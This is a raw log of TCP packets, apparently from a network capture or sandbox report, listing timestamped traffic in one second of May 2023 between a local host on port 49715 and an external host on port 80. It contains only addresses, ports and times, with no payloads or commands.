May 28, 2023 09:29:41.936079979 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.936091900 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.936100006 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.936126947 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.936158895 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.936162949 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.936186075 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.936204910 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.936206102 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.936225891 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.936228037 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.936249018 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.936249971 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.936275959 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.936283112 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.936296940 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.936305046 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.936325073 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.936326027 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.936348915 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.936364889 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.936366081 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.936388016 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.936405897 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.936407089 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.936429977 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.936433077 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.936453104 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.936453104 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.936474085 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.936475992 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.936495066 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.936495066 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.936516047 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.936521053 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.936536074 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.936543941 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.936557055 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.936567068 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.936578989 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.936589003 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.936599016 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.936613083 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.936619043 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.936638117 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.936639071 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.936661959 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.936676025 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.936682940 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.936701059 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.936703920 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.936724901 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.936731100 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.936745882 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.936753035 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.936765909 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.936779022 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.936785936 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.936803102 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.936808109 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.936827898 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.936837912 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.936849117 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.936867952 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.936873913 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.936888933 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.936909914 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.936913967 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.936928988 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.936935902 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.936949968 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.936969995 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.936973095 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.936989069 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.937006950 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.937010050 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.937030077 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.937030077 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.937051058 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.937062979 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.937072992 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.937084913 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.937093019 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.937109947 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.937112093 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.937133074 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.937150955 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.937156916 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.937170982 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.937180042 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.937191010 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.937210083 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.937217951 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.937231064 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.937244892 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.937249899 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.937268972 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.937275887 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.937289000 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.937308073 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.937311888 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.937328100 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.937334061 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.937347889 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.937366962 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.937372923 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.937388897 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.937407970 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.937410116 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.937427998 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.937431097 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.937448978 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.937468052 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.937468052 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.937489033 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.937503099 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.937508106 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.937527895 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.937540054 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.937549114 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.937567949 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.937573910 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.937587976 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.937597036 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.937608004 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.937628984 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.937640905 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.937649965 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.937670946 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.937674999 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.937690973 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.937697887 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.937711954 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.937731028 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.937735081 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.937750101 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.937769890 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.937776089 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.937791109 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.937797070 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.937809944 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.937829018 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.937829971 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.937850952 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.937866926 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.937871933 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.937891006 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.937900066 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.937911034 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.937927008 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.937936068 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.937944889 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.937962055 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.937966108 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.937985897 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.937999964 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.938007116 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.938026905 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.938034058 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.938046932 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.938059092 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.938066959 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.938086987 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.938092947 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.938107014 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.938126087 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.938137054 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.938146114 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.938158989 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.938165903 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.938185930 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.938199997 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.938205957 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.938226938 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.938236952 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.938247919 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.938266993 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.938286066 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.938292027 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.938306093 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.938325882 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.938325882 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.938344955 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.938357115 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.938364983 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.938385010 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.938388109 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.938405037 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.938420057 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.938426018 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.938445091 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.938462973 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.938465118 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.938486099 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.938504934 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.938504934 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.938525915 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.938538074 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.938544989 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.938565016 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.938568115 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.938585043 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.938600063 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.938606024 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.938626051 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.938641071 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.938647985 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.938668013 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.938687086 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.938688040 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.938707113 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.938719034 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.938728094 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.938747883 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.938747883 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.938767910 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.938786983 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.938787937 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.938807964 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.938828945 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.938833952 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.938854933 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.938874006 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.938874960 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.938893080 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.938909054 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.938911915 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.938931942 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.938942909 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.938951969 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.938973904 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.938985109 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.938993931 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.939013004 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.939028025 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.939032078 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.939052105 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.939064980 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.939071894 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.939091921 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.939095974 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.939110994 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.939126968 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.939132929 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.939152956 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.939172029 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.939172029 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.939194918 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.939209938 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.939215899 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.939237118 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.939240932 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.939258099 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.939277887 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.939289093 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.939299107 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.939320087 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.939332008 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.939340115 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.939357996 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.939361095 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.939382076 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.939383984 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.939403057 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.939423084 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.939424038 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.939443111 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.939461946 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.939462900 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.939482927 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.939501047 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.939502001 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.939522028 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.939541101 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.939541101 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.939563990 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.939565897 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.939584017 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.939589977 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.939605951 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.939625025 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.939627886 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.939646959 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.939666986 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.939667940 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.939688921 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.939690113 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.939708948 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.939728022 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.939728022 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.939749956 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.939765930 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.939769030 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.939790010 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.939805031 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.939810038 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.939830065 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.939843893 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.939850092 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.939871073 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.939877987 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.939889908 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.939908981 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.939915895 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.939935923 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.939939976 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.939956903 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.939975977 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.939980030 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.939996958 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.940002918 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.940017939 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.940036058 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.940042973 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.940088034 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.999963999 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.000001907 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.000017881 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.000148058 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:42.000186920 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:42.003801107 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.003832102 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.003926992 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.003947020 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.003953934 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:42.003967047 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.003983021 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:42.003988981 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.004009008 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.004014969 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:42.004051924 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:42.004121065 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.004142046 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.004163027 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.004163980 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:42.004183054 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.004199982 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:42.004203081 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.004225016 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.004234076 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:42.004245043 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.004275084 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:42.004303932 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:42.004312038 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.004333019 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.004353046 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:42.004354000 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:42.004373074 CEST	49715	80	192.168.2.5	193.106.175.215
